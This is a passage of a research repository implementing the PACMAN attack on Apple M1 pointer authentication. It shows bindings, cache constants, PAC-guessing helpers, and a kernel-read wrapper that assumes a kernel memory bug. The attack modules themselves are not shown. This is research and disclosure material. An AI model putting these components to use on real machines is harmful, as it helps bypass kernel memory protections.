├── .gitignore ├── src ├── libdarwin │ ├── crandom.rs │ ├── iokit.rs │ ├── kernel_rw.rs │ └── mach.rs ├── libdarwin.rs ├── msr.rs ├── attacks.rs ├── qos.rs ├── counter.rs ├── retpoline.rs ├── cache.rs ├── pac.rs ├── timer_multithread.rs ├── timer_msr.rs ├── main.rs ├── attacks │ ├── spectre.rs │ ├── prime_probe.rs │ ├── evict_reload.rs │ └── pacman.rs ├── evset.rs ├── tests.rs └── pacmankit.rs ├── Cargo.toml ├── README.md ├── misc ├── testmsr.c ├── machine_perfmon.h ├── pacman.h └── perfmon.c └── LICENSE /.gitignore: -------------------------------------------------------------------------------- 1 | /target 2 | Cargo.lock 3 | .DS_Store 4 | -------------------------------------------------------------------------------- /src/libdarwin/crandom.rs: -------------------------------------------------------------------------------- 1 | /*! 2 | * C Random methods 3 | */ 4 | 5 | extern "C" { 6 | pub fn rand() -> i32; 7 | pub fn srand(seed: u32); 8 | } 9 | -------------------------------------------------------------------------------- /src/libdarwin.rs: -------------------------------------------------------------------------------- 1 | /*! 2 | * Rust bindings to the various Darwin frameworks we need for PACMAN to work. 3 | */ 4 | 5 | pub mod iokit; 6 | pub mod mach; 7 | pub mod kernel_rw; 8 | pub mod crandom; 9 | -------------------------------------------------------------------------------- /Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "pacman" 3 | version = "0.1.0" 4 | edition = "2021" 5 | 6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 7 | 8 | [dependencies] 9 | rand = "0.8.5" 10 | -------------------------------------------------------------------------------- /src/msr.rs: -------------------------------------------------------------------------------- 1 | /*! 
2 | * Routines for reading MSRs 3 | */ 4 | use core::arch::asm; 5 | 6 | pub unsafe fn read_ctr_el0() -> u64 { 7 | let val : u64; 8 | asm!{ 9 | "mrs {val}, ctr_el0", 10 | val = out(reg) val, 11 | } 12 | return val; 13 | } 14 | -------------------------------------------------------------------------------- /src/attacks.rs: -------------------------------------------------------------------------------- 1 | /*! 2 | * Implementations of the various attacks. 3 | */ 4 | 5 | // Evict+Reload implementation for creating latency graphs 6 | pub mod evict_reload; 7 | 8 | // Prime+Probe testbed for determining effective prime+probe parameters 9 | pub mod prime_probe; 10 | 11 | // Spectre testbed for testing speculative execution in the kernel 12 | pub mod spectre; 13 | 14 | // The actual PACMAN attack code itself 15 | pub mod pacman; 16 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # The PACMAN Attack 2 | PACMAN except in rust! 3 | 4 | ## Experiments 5 | Experiments are launched from `src/main.rs`. You can uncomment the experiment you'd like to run in `attack`. 6 | 7 | ## Build and Run 8 | 9 | `cargo run -r` 10 | 11 | ## Clean 12 | 13 | `cargo clean` 14 | 15 | ## Build Docs 16 | 17 | `cargo doc` 18 | 19 | You can visit `target/doc/pacman/index.html` to see the auto-generated documentation. 20 | 21 | ## Dependencies 22 | 23 | For this to work you'll need a recent version of Rust. [Get Rust here!](https://www.rust-lang.org/tools/install) 24 | -------------------------------------------------------------------------------- /misc/testmsr.c: -------------------------------------------------------------------------------- 1 | // objdump -d testmsr 2 | // Use the hex values of each MSR instruction in Ghidra to find anything in the kernelcache 3 | // that writes to these particular MSRs. 
Then you can trace those functions via the development 4 | // kernel and XNU sources (assuming no kexts write to the MSR). 5 | int main () { 6 | // PMC0: 7 | asm volatile("msr S3_2_c15_c0_0, x0"); 8 | 9 | // PMCR0: 10 | asm volatile("msr S3_1_c15_c0_0, x0"); 11 | 12 | // PMCR1: 13 | asm volatile("msr S3_1_c15_c1_0, x1"); 14 | 15 | // READ PMCR1: 16 | asm volatile("mrs x2, S3_1_c15_c1_0"); 17 | 18 | // Patch for CNTKCTL_EL1 19 | asm volatile("orr x8,x8,#0x300"); 20 | 21 | // Read CNTKCTL_EL1 22 | asm volatile("msr CNTKCTL_EL1, x8"); 23 | 24 | asm volatile("nop"); 25 | asm volatile("orr x8,x8,#0xf"); 26 | 27 | asm volatile("movk w8, #0x4700, lsl #16"); 28 | 29 | asm volatile("autdza x0"); 30 | asm volatile("autda x0, x1"); 31 | asm volatile("autia x0, x1"); 32 | asm volatile("blr x0"); 33 | asm volatile("autiza x0"); 34 | asm volatile("nop"); 35 | asm volatile("autib x0, x1"); 36 | asm volatile("blraa x0, x1"); 37 | } -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2022 Joseph Ravichandran, Weon Taek Na, Jay Lang, Mengjia Yan 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 
14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /src/libdarwin/iokit.rs: -------------------------------------------------------------------------------- 1 | /*! 2 | * FFI Bindings to the IOKit.framework library. 3 | */ 4 | use std::ffi::c_void; 5 | use std::os::raw::c_char; 6 | use crate::mach; 7 | use mach::{KernReturn, MachPort}; 8 | 9 | pub type IOService = MachPort; 10 | pub type IOName = [c_char;128]; 11 | pub type IOConnect = MachPort; 12 | 13 | pub const IO_OBJECT_NULL : IOService = 0; 14 | 15 | #[link(name = "IOKit", kind="framework")] 16 | extern "C" { 17 | pub static kIOMainPortDefault : MachPort; 18 | pub fn IOServiceGetMatchingService(mainPort : MachPort, cfdictref : *const c_void) -> IOService; 19 | pub fn IOServiceMatching(name: *const i8) -> *const c_void; 20 | pub fn IORegistryEntryGetName(entry: IOService, name: *mut IOName) -> KernReturn; 21 | pub fn IOServiceOpen(service: IOService, owningTask: MachPort, r#type: u32, connect: *mut IOConnect) -> KernReturn; 22 | pub fn IOConnectCallScalarMethod( 23 | connection: IOConnect, 24 | selector: u32, 25 | input: *const u64, 26 | inputCnt: u32, 27 | output: *mut u64, 28 | outputCnt: *mut u32 29 | ) -> KernReturn; 30 | pub fn IOServiceClose(connect: IOConnect) -> KernReturn; 31 | pub fn IOObjectRelease(connect: IOConnect) -> KernReturn; 32 | } 33 | -------------------------------------------------------------------------------- /src/qos.rs: 
-------------------------------------------------------------------------------- 1 | //! Utilities for pinning a thread to a particular kind of core (P or E core) 2 | use core::arch::asm; 3 | 4 | // sys/qos.h 5 | /** 6 | * Constants for the different kinds of cores on M1. 7 | */ 8 | #[repr(u64)] 9 | pub enum CoreKind { 10 | PCORE = 0x21, // QOS_CLASS_USER_INTERACTIVE 11 | ECORE = 0x09, // QOS_CLASS_BACKGROUND 12 | } 13 | 14 | // See pthread/qos.h 15 | #[link(name = "system")] 16 | extern "C" { 17 | #[doc(hidden)] 18 | pub fn pthread_set_qos_class_self_np(flavor: CoreKind, priority: u64) -> i32; 19 | } 20 | 21 | /** 22 | * Switches the current process onto a different core. 23 | * 24 | * # Arguments 25 | * * `kind`: Which kind of core do we want to run on? 26 | * 27 | * # Return Value 28 | * Returns `true` on success, `false` on failure. 29 | */ 30 | pub unsafe fn set_core(kind: CoreKind) -> bool { 31 | return 0 == pthread_set_qos_class_self_np(kind, 0); 32 | } 33 | 34 | /** 35 | * Returns the current core we are operating on. 36 | * 37 | * Has nothing to do with the pthread qos libraries, but it fits the theme of 38 | * "select a core" so it goes here. 39 | * 40 | * # Return Value 41 | * An integer representing the current core. If this value changes, you switched cores. 42 | */ 43 | pub fn core_id() -> u64 { 44 | unsafe { 45 | let cur_core : u64; 46 | asm!{ 47 | "mrs {cur_core}, TPIDRRO_EL0", 48 | cur_core = out(reg) cur_core, 49 | } 50 | return cur_core & 0x07; 51 | } 52 | } 53 | -------------------------------------------------------------------------------- /src/counter.rs: -------------------------------------------------------------------------------- 1 | /*! 2 | * A dedicated thread for measuring a variable that just counts up. 3 | * 4 | * Surprisingly useful for observing the effects of time (so long 5 | * as all measurements include a serializing sync barrier instruction!) 
6 | */ 7 | 8 | use crate::*; 9 | 10 | /** 11 | * A globally visible counter that can be sampled to get a rough measurement of how far time has passed. 12 | * 13 | * Don't forget to synchronize before sampling! 14 | */ 15 | pub static mut CTR : u64 = 0; 16 | 17 | /** 18 | * Continuously increment the counter variable to get a sense of how much time has passed. 19 | */ 20 | pub unsafe fn counter_thread() { 21 | if !set_core(CoreKind::PCORE) { 22 | println!("Error setting CPU affinity!"); 23 | return; 24 | } 25 | loop { 26 | // write_volatile(&mut CTR, read_volatile(&CTR) + 1); 27 | asm!{ 28 | "eor x0, x0, x0", 29 | "1:", 30 | "str x0, [{cnt_addr}]", 31 | "add x0, x0, 1", 32 | "b 1b", 33 | cnt_addr = in(reg) &mut counter::CTR as *mut u64 as u64, 34 | } 35 | } 36 | } 37 | 38 | /** 39 | * Sample the current counter value. Handles all synchronization as appropriate. 40 | * 41 | * DEPRECATED- DO NOT USE 42 | * See timer_multithread.rs instead. 43 | */ 44 | #[inline(always)] 45 | pub unsafe fn read_counter() -> u64 { 46 | asm!{ 47 | "isb" 48 | } 49 | let retval = read_volatile(&CTR); 50 | asm!{ 51 | "isb" 52 | } 53 | 54 | return retval; 55 | } 56 | -------------------------------------------------------------------------------- /src/libdarwin/kernel_rw.rs: -------------------------------------------------------------------------------- 1 | /*! 2 | * Wrapper to activate the kernel read/ write bug we assume we have. 3 | * 4 | * DEPRECATED in favor of the PacmanKit kext (see pacmankit.rs). 5 | */ 6 | use crate::*; 7 | 8 | pub const KERNEL_PID : u64 = 0; 9 | 10 | pub const SYS_KAS_INFO : u64 = 439u64; 11 | 12 | /** 13 | * Returns the kernel slide using kas_info (#439) 14 | * 15 | * Not currently working- we lack the entitlement required to run! 
16 | */ 17 | pub unsafe fn sys_kas_info() -> usize { 18 | // KAS_INFO_KERNEL_TEXT_SLIDE_SELECTOR 19 | let selector : u64 = 0; 20 | 21 | let mut val : u64 = 0; 22 | let mut sz : u64 = 8; 23 | 24 | let retval : KernReturn; 25 | 26 | asm!{ 27 | "svc #0", 28 | in("x0") selector, 29 | in("x1") &mut val as *mut u64, 30 | in("x2") &mut sz as *mut u64, 31 | in("x8") SYS_KAS_INFO, 32 | in("x16") SYS_KAS_INFO, 33 | lateout("x0") retval, 34 | } 35 | 36 | if retval != KERN_SUCCESS { 37 | println!("Warning- kas_info failed!"); 38 | } 39 | 40 | return val as usize; 41 | } 42 | 43 | /** 44 | * Reads a virtual address from the kernel. 45 | * 46 | * Here we use a patched kernel to get tfp0 and 47 | * use it to read from kernel memory with the mach vm API. 48 | * 49 | * A real attacker would replace this with their memory corruption bug of choice. 50 | */ 51 | pub unsafe fn kern_read(addr: usize) -> Option { 52 | let mut kernel_task_port : MachPort = 0; 53 | 54 | match task_for_pid(mach_task_self(), KERNEL_PID, &mut kernel_task_port) { 55 | KERN_SUCCESS => {}, 56 | err => { 57 | println!("Error aquiring the kernel task port. Did you forget to run as root? Error string: Error code 0x{:X} ({:?})", err, std::ffi::CStr::from_ptr(mach_error_string(err))); 58 | return None; 59 | } 60 | } 61 | 62 | println!("Aquired the kernel task port! {:X}", kernel_task_port); 63 | 64 | let kas_slide = sys_kas_info(); 65 | println!("Kernel slide is {:X}", kas_slide); 66 | 67 | let mut new_data : *const u8 = 0 as *const u8; 68 | let mut data_count : u64 = 0; 69 | match mach_vm_read( 70 | kernel_task_port, 71 | addr, 72 | 8, 73 | &mut new_data, 74 | &mut data_count 75 | ) { 76 | KERN_SUCCESS => {}, 77 | err => { 78 | println!("Error reading from kernel memory. 
Error code 0x{:X} ({:?})", err, std::ffi::CStr::from_ptr(mach_error_string(err))); 79 | return None; 80 | } 81 | } 82 | 83 | return None; 84 | } 85 | -------------------------------------------------------------------------------- /misc/machine_perfmon.h: -------------------------------------------------------------------------------- 1 | // Copyright (c) 2020 Apple Inc. All rights reserved. 2 | // 3 | // @APPLE_OSREFERENCE_LICENSE_HEADER_START@ 4 | // 5 | // This file contains Original Code and/or Modifications of Original Code 6 | // as defined in and that are subject to the Apple Public Source License 7 | // Version 2.0 (the 'License'). You may not use this file except in 8 | // compliance with the License. The rights granted to you under the License 9 | // may not be used to create, or enable the creation or redistribution of, 10 | // unlawful or unlicensed copies of an Apple operating system, or to 11 | // circumvent, violate, or enable the circumvention or violation of, any 12 | // terms of an Apple operating system software license agreement. 13 | // 14 | // Please obtain a copy of the License at 15 | // http://www.opensource.apple.com/apsl/ and read it before using this file. 16 | // 17 | // The Original Code and all software distributed under the License are 18 | // distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER 19 | // EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, 20 | // INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, 21 | // FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. 22 | // Please see the License for the specific language governing rights and 23 | // limitations under the License. 
24 | // 25 | // @APPLE_OSREFERENCE_LICENSE_HEADER_END@ 26 | 27 | #if KERNEL 28 | // Joseph- I added this to match the one in osfmk xnu source 29 | // This file is copied from Kernel.framework and modified as needed 30 | #include 31 | #endif // KERNEL 32 | 33 | // Added stuff 34 | #include 35 | #define PERFMON_SPEC_MAX_EVENT_COUNT (16) 36 | #define PERFMON_SPEC_MAX_ATTR_COUNT (32) 37 | typedef struct perfmon_config *perfmon_config_t; 38 | // End added stuff 39 | 40 | #include 41 | #include 42 | #include 43 | 44 | struct perfmon_counter { 45 | uint64_t pc_number; 46 | }; 47 | 48 | struct perfmon_config { 49 | struct perfmon_source *pc_source; 50 | struct perfmon_spec pc_spec; 51 | unsigned short pc_attr_ids[PERFMON_SPEC_MAX_ATTR_COUNT]; 52 | 53 | struct perfmon_counter *pc_counters; 54 | uint64_t pc_counters_used; 55 | uint64_t pc_attrs_used; 56 | 57 | bool pc_configured:1; 58 | }; 59 | 60 | /// Fill in an array of register values for all units. 61 | void perfmon_machine_sample_regs(enum perfmon_kind kind, uint64_t *regs, 62 | size_t regs_len); 63 | 64 | // Set up the counters as specified by the configuration. 65 | int perfmon_machine_configure(enum perfmon_kind kind, 66 | const perfmon_config_t config); 67 | 68 | // Reset the counters to an inactive state. 
69 | void perfmon_machine_reset(enum perfmon_kind kind); 70 | -------------------------------------------------------------------------------- /misc/pacman.h: -------------------------------------------------------------------------------- 1 | #ifndef PACMAN_H 2 | #define PACMAN_H 3 | 4 | #include 5 | #include 6 | 7 | // Pacman header v2 has the patches for the PAC and AUT macros 8 | #define PACMAN_HEADER_VERSION ((2)) 9 | 10 | #define L1_SIZE ((0x20000)) 11 | #define L2_SIZE ((0xC00000)) 12 | 13 | // The bits that make up a PAC 14 | #define PAC_BITMASK ((0xFFFF800000000000ULL)) 15 | 16 | // The important registers for PMC 17 | #define SREG_PMCR0 "S3_1_c15_c0_0" 18 | #define SREG_PMCR1 "S3_1_c15_c1_0" 19 | #define SREG_PMC0 "S3_2_c15_c0_0" 20 | #define SREG_PMC1 "S3_2_c15_c1_0" 21 | 22 | /* 23 | * SREG_WRITE 24 | * Write into an MSR using an instruction barrier afterwords 25 | * MSR[SR] <- V 26 | */ 27 | #define SREG_WRITE(SR, V) \ 28 | __asm__ volatile("msr " SR ", %0 \r\n isb \r\n" : : "r"((uint64_t)V)) 29 | 30 | /* 31 | * SREG_READ 32 | * Read from an MSR without any instruction barriers 33 | * Returns MSR[SR] 34 | */ 35 | #define SREG_READ(SR) \ 36 | ({ \ 37 | uint64_t VAL = 0; \ 38 | __asm__ volatile("mrs %0, " SR " \r\n" : "=r"(VAL)); \ 39 | VAL; \ 40 | }) 41 | 42 | /* 43 | * pac_sign 44 | * Performs PACIA (sign instruction pointer with A key) on addr using 45 | * salt given by salt. 
46 | * 47 | * Returns the signed pointer 48 | */ 49 | __attribute__((always_inline)) static inline uint64_t pac_sign(uint64_t addr, uint64_t salt) { 50 | uint64_t result = addr; 51 | asm volatile( 52 | "pacia %[result], %[salt] \n\r" \ 53 | : [result]"+r"(result) 54 | : [salt]"r"(salt) 55 | : 56 | ); 57 | return result; 58 | } 59 | 60 | #define PAC_SIGN(ADDR, SALT) \ 61 | ({ \ 62 | uint64_t PAC_VAL = ADDR; \ 63 | asm volatile("pacia %[result], %[salt] \n\r" : [result]"+r"(PAC_VAL) : [salt]"r"((uint64_t)SALT) : ); \ 64 | PAC_VAL; \ 65 | }) 66 | 67 | /* 68 | * pac_auth 69 | * Performs AUTIA (authenticate instruction pointer with A key) on addr using 70 | * salt given by salt. 71 | * 72 | * Returns the signed pointer 73 | */ 74 | __attribute__((always_inline)) static inline uint64_t pac_auth(uint64_t addr, uint64_t salt) { 75 | uint64_t result = addr; 76 | asm volatile( 77 | "autia %[result], %[salt] \n\r" 78 | : [result]"+r"(result) 79 | : [salt]"r"(salt) 80 | : 81 | ); 82 | return result; 83 | } 84 | 85 | #define PAC_AUTH(ADDR, SALT) \ 86 | ({ \ 87 | uint64_t PAC_VAL = ADDR; \ 88 | asm volatile("autia %[result], %[salt] \n\r" : [result]"+r"(PAC_VAL) : [salt]"r"((uint64_t)SALT) : ); \ 89 | PAC_VAL; \ 90 | }) 91 | 92 | /* 93 | * get_current_core 94 | * Returns the ID of the core that we are currently executing code on. 95 | */ 96 | static uint64_t get_current_core(void) { 97 | return SREG_READ("TPIDRRO_EL0") & 7; 98 | } 99 | 100 | #endif // PACMAN_H 101 | -------------------------------------------------------------------------------- /src/retpoline.rs: -------------------------------------------------------------------------------- 1 | /*! 2 | * Generate a trampoline made of return instructions. 3 | */ 4 | 5 | use crate::*; 6 | 7 | /// The opcode for a return instruction 8 | pub const RET_INST : u32 = 0xd65f03c0; 9 | pub const NOP_INST : u32 = 0xd503201f; 10 | 11 | /** 12 | * Fill a page with `ret` instructions, and make it executable. 
13 | * 14 | * # Return Value 15 | * Returns Error on failure, Ok on success. 16 | */ 17 | pub unsafe fn mk_retpoline_page(page: &mut [u8]) -> Result<(), ()> { 18 | if page.len() < cache::PAGE_SIZE { 19 | return Err(()); 20 | } 21 | 22 | let retpoline_ptr = page.as_mut_ptr(); 23 | 24 | match mach_vm_protect( 25 | mach_task_self(), 26 | retpoline_ptr, 27 | cache::PAGE_SIZE, 28 | 0, 29 | (VM_PROT_READ | VM_PROT_WRITE) 30 | ) { 31 | KERN_SUCCESS => {}, 32 | err => { 33 | println!("Error calling mach_vm_protect! Error code 0x{:X} ({:?})", err, std::ffi::CStr::from_ptr(mach_error_string(err))); 34 | return Err(()); 35 | } 36 | } 37 | 38 | let page_as_u32 = core::slice::from_raw_parts_mut(retpoline_ptr as *mut u32, cache::PAGE_SIZE / core::mem::size_of::()); 39 | page_as_u32.fill(RET_INST); 40 | 41 | match mach_vm_protect( 42 | mach_task_self(), 43 | retpoline_ptr, 44 | cache::PAGE_SIZE, 45 | 0, 46 | (VM_PROT_READ | VM_PROT_EXECUTE) 47 | ) { 48 | KERN_SUCCESS => {}, 49 | err => { 50 | println!("Error calling mach_vm_protect! Error code 0x{:X} ({:?})", err, std::ffi::CStr::from_ptr(mach_error_string(err))); 51 | return Err(()); 52 | } 53 | } 54 | 55 | return Ok(()); 56 | } 57 | 58 | /** 59 | * Fill a given memory range with `ret` instructions, and make it executable. 60 | * 61 | * # Return Value 62 | * Returns Error on failure, Ok on success. 63 | */ 64 | pub unsafe fn mk_retpoline_addr(addr: u64, size: usize) -> Result<(), ()> { 65 | let retpoline_ptr = addr as *mut u8; 66 | 67 | match mach_vm_protect( 68 | mach_task_self(), 69 | retpoline_ptr, 70 | size, 71 | 0, 72 | (VM_PROT_READ | VM_PROT_WRITE) 73 | ) { 74 | KERN_SUCCESS => {}, 75 | err => { 76 | println!("Error calling mach_vm_protect! 
Error code 0x{:X} ({:?})", err, std::ffi::CStr::from_ptr(mach_error_string(err))); 77 | return Err(()); 78 | } 79 | } 80 | 81 | let page_as_u32 = core::slice::from_raw_parts_mut(retpoline_ptr as *mut u32, size / core::mem::size_of::()); 82 | page_as_u32.fill(RET_INST); 83 | 84 | match mach_vm_protect( 85 | mach_task_self(), 86 | retpoline_ptr, 87 | size, 88 | 0, 89 | (VM_PROT_READ | VM_PROT_EXECUTE) 90 | ) { 91 | KERN_SUCCESS => {}, 92 | err => { 93 | println!("Error calling mach_vm_protect! Error code 0x{:X} ({:?})", err, std::ffi::CStr::from_ptr(mach_error_string(err))); 94 | return Err(()); 95 | } 96 | } 97 | 98 | return Ok(()); 99 | } 100 | -------------------------------------------------------------------------------- /src/cache.rs: -------------------------------------------------------------------------------- 1 | /*! 2 | * Routines for interacting with addresses. 3 | */ 4 | 5 | pub const L1D_WAYS : usize = 8; 6 | pub const L1D_SETS : usize = 256; 7 | pub const L1D_LINESIZE : usize = 64; 8 | 9 | pub const L1I_WAYS : usize = 6; 10 | pub const L1I_SETS : usize = 512; 11 | pub const L1I_LINESIZE : usize = 64; 12 | 13 | pub const L2_WAYS : usize = 12; 14 | pub const L2_SETS : usize = 8192; 15 | pub const L2_LINESIZE : usize = 128; 16 | 17 | /// sysctl -a | grep "l2" 18 | pub const L2_SIZE : usize = 0xC00000; 19 | 20 | /// P-Core iCache size 21 | pub const L1I_SIZE : usize = 0x30000; 22 | 23 | /// How large is a page (16KB on M1) 24 | pub const PAGE_SIZE : usize = 0x4000usize; 25 | 26 | /// AND with this constant to get the offset within a page (for 16KB pages) 27 | pub const PAGE_OFFSET_MASK : usize = 0x3FFFusize; 28 | 29 | /// Same as page offset mask except include more VA bits to conflict in TLBs 30 | pub const TLB_OFFSET_MASK : usize = 0x7FFFFFFFFFusize; 31 | 32 | /* 33 | For L2 cache on M1: 34 | 63 20|19 7|6 0| 35 | +------------------+-------------+-------------+ 36 | | Tag | Set | Offset | 37 | +------------------+-------------+-------------+ 38 | 39 | 
For M1 16KB pages: 40 | |63 14|13 0| 41 | +----------------------------------------------+ 42 | | VPN | Offset | 43 | +----------------------------------------------+ 44 | 45 | Addresses can differ in bits [13:7] and still remain in the same page (but different sets). 46 | There are 2^6 == 64 different cache sets contained within a page. 47 | */ 48 | 49 | /// Returns the L2 cache tag of a given physical address 50 | pub fn get_cache_tag_generic(addr: u64) -> u64 { 51 | let set_shift = (L2_SETS as f64).log2().ceil().round() as u64; 52 | let offset_shift = (L2_LINESIZE as f64).log2().ceil().round() as u64; 53 | return (addr >> (set_shift + offset_shift)); 54 | } 55 | 56 | /// Returns the L2 set index of a given physical address 57 | pub fn get_cache_set_generic(addr: u64) -> u64 { 58 | let offset_shift = (L2_LINESIZE as f64).log2().ceil().round() as u64; 59 | return (addr >> offset_shift) & (L2_SETS as u64 - 1u64); 60 | } 61 | 62 | /// Returns the L2 cache line offset of a given physical address 63 | pub fn get_cache_offset_generic(addr: u64) -> u64 { 64 | return addr & (L2_LINESIZE as u64 - 1u64); 65 | } 66 | 67 | /// Returns the L2 cache tag of a given physical address 68 | /// NOTE: Only works on M1! 69 | #[inline(always)] 70 | pub fn get_cache_tag_m1(addr: u64) -> u64 { 71 | return (addr >> 20) & 0xFFFFFFFFFFF; 72 | } 73 | 74 | /// Returns the L2 set index of a given physical address 75 | /// NOTE: Only works on M1! 76 | #[inline(always)] 77 | pub fn get_cache_set_m1(addr: u64) -> u64 { 78 | return (addr >> 7) & 0xFFFF; 79 | } 80 | 81 | /// For VIPT caches we need to make sure the virtual set index is correct too 82 | #[inline(always)] 83 | pub fn get_l1_cache_set_m1(addr: u64) -> u64 { 84 | return (addr >> 6) & 0x1FF; 85 | } 86 | 87 | /// Returns the L2 cache line offset of a given physical address 88 | /// NOTE: Only works on M1! 
89 | #[inline(always)] 90 | pub fn get_cache_offset_m1(addr: u64) -> u64 { 91 | return addr & 0x7F; 92 | } 93 | -------------------------------------------------------------------------------- /src/pac.rs: -------------------------------------------------------------------------------- 1 | /*! 2 | * Utilities for working with pointer authentication codes (PACs) 3 | */ 4 | 5 | /* 6 | 7 | This is what a PAC'ed pointer looks like: 8 | 9 | 63 56| 55 |54 47|46 0| 10 | +-----------+----+----------+---------+ 11 | | PAC[15:5] | EL | PAC[4:0] | Address | 12 | +-----------+----+----------+---------+ 13 | 14 | PAC[15:0]: The 16 bit pointer authentication code 15 | Address: The rest of the address 16 | EL: 1 for kernel pointers, 0 for user pointers 17 | 18 | According to page D5-2656 of the ARM manual: 19 | "The PAC field is Xn[63:56, 54:bottom_PAC_bit]." 20 | */ 21 | 22 | type PAC = u16; 23 | 24 | /// Mask a kernel address with this value to eliminate the PAC 25 | pub const PAC_BITMASK : u64 = 0xFFFF800000000000u64; 26 | 27 | /// Number of possible PACs (2^16 on M1) 28 | pub const NUM_PACS : usize = 0xFFFFusize; 29 | 30 | pub const MAX_PAC : PAC = 0xFFFF; 31 | 32 | /** 33 | * Returns the PAC part of a signed pointer 34 | */ 35 | pub fn extract_pac(signed_pointer: u64) -> PAC { 36 | let pac_lower = (signed_pointer >> 47) & 0x0FF; 37 | let pac_upper = (signed_pointer >> 56) & 0x0FF; 38 | 39 | return ((pac_upper << 8) | pac_lower).try_into().unwrap(); 40 | } 41 | 42 | /** 43 | * Encodes a PAC into a pointer 44 | */ 45 | pub fn encode_pac(pac: PAC, pointer: u64) -> u64 { 46 | let pac_lower = (pac as u64 & 0x0FF) << 47; 47 | let pac_upper = ((pac as u64 >> 8) & 0x0FF) << 56; 48 | 49 | let pac_kernel_bit = if is_kernel_pointer(pointer) {(1 << 55)} else {0}; 50 | 51 | return (pointer & (!PAC_BITMASK)) | pac_lower | pac_upper | pac_kernel_bit; 52 | } 53 | 54 | /** 55 | * Returns true if this is a kernel pointer (bit 52 set), false otherwise. 
56 | */ 57 | pub fn is_kernel_pointer(addr: u64) -> bool { 58 | return (addr & (1 << 55)) != 0; 59 | } 60 | 61 | /// An iterator to try every possible PAC value for a given address 62 | pub struct PACIterator{ 63 | /// The current PAC value being considered 64 | cur_pac: PAC, 65 | 66 | /// Have we reported MAX_PAC yet? 67 | reported_last: bool, 68 | 69 | /// The masked pointer to use (kernel or user is fine) 70 | addr: u64, 71 | } 72 | 73 | impl Iterator for PACIterator { 74 | type Item = u64; 75 | 76 | fn next(&mut self) -> Option { 77 | // Whatever self.cur_pac currently is will be what we report 78 | let old_pac = self.cur_pac; 79 | 80 | if self.cur_pac == MAX_PAC { 81 | // If the current PAC is the max one, check if we 82 | // have already returned MAX_PAC before. If so, return None 83 | if self.reported_last { 84 | return None; 85 | } 86 | self.reported_last = true; 87 | } 88 | else { 89 | // Configure next PAC 90 | self.cur_pac = self.cur_pac + 1; 91 | } 92 | 93 | return Some(encode_pac(old_pac, self.addr)); 94 | } 95 | } 96 | 97 | /// Get an iterator to loop over all PAC values for a given pointer 98 | pub fn iterate_pacs(addr: u64) -> PACIterator { 99 | if is_kernel_pointer(addr) { 100 | return PACIterator{ 101 | cur_pac: 0, 102 | reported_last: false, 103 | addr: addr | PAC_BITMASK, 104 | }; 105 | } 106 | else { 107 | return PACIterator{ 108 | cur_pac: 0, 109 | reported_last: false, 110 | addr: addr & (!PAC_BITMASK), 111 | }; 112 | } 113 | } 114 | -------------------------------------------------------------------------------- /src/libdarwin/mach.rs: -------------------------------------------------------------------------------- 1 | /*! 2 | * Bindings to various libsystem mach endpoints. 
3 | */ 4 | 5 | pub const VM_PROT_NONE : u64 = 0x00; 6 | pub const VM_PROT_READ : u64 = 0x01; 7 | pub const VM_PROT_WRITE : u64 = 0x02; 8 | pub const VM_PROT_EXECUTE : u64 = 0x04; 9 | 10 | /// (for vm_allocate): Place memory allocation anywhere 11 | pub const VM_FLAGS_ANYWHERE : u64 = 0x0001; 12 | 13 | /// (for vm_allocate): Use huge pages 14 | pub const VM_FLAGS_SUPERPAGE_MASK : u64 = 0x70000; 15 | 16 | pub const KERN_SUCCESS : KernReturn = 0; 17 | 18 | pub type MachPort = u32; 19 | pub type KernReturn = i32; 20 | 21 | #[link(name = "system")] 22 | extern "C" { 23 | /** 24 | * Binding to the mach_absolute_time method from libsystem. 25 | */ 26 | pub fn mach_absolute_time() -> u64; 27 | } 28 | 29 | /** 30 | * Returns a counter that represents the current time. 31 | */ 32 | pub fn gettime() -> u64 { 33 | unsafe { 34 | return mach_absolute_time(); 35 | } 36 | } 37 | 38 | #[link(name = "system")] 39 | extern "C" { 40 | #[doc(hidden)] 41 | static mach_task_self_ : MachPort; 42 | 43 | /** 44 | * Allocate a chunk of memory. 45 | * 46 | * # Arguments 47 | * * `target`: The port to allocate memory on. 48 | * * `addr`: A mutable pointer that will be updated to contain the address of the new memory. 49 | * * `size`: How many bytes to allocate? 50 | * * `flags`: Various flags to control allocation. 51 | * 52 | * # Return Value 53 | * Returns a kernel error return type (`kern_return_t`). If this is not `KERN_SUCCESS`, 54 | * then some sort of error occurred. The error can be viewed with `mach_error_string`. 55 | */ 56 | pub fn mach_vm_allocate(target: MachPort, addr: *mut *mut u8, size: usize, flags: u64) -> KernReturn; 57 | 58 | /** 59 | * Change protections on a chunk of memory. 60 | * 61 | * # Arguments 62 | * * `target`: The port that owns the address. 63 | * * `addr`: Which address to update? 64 | * * 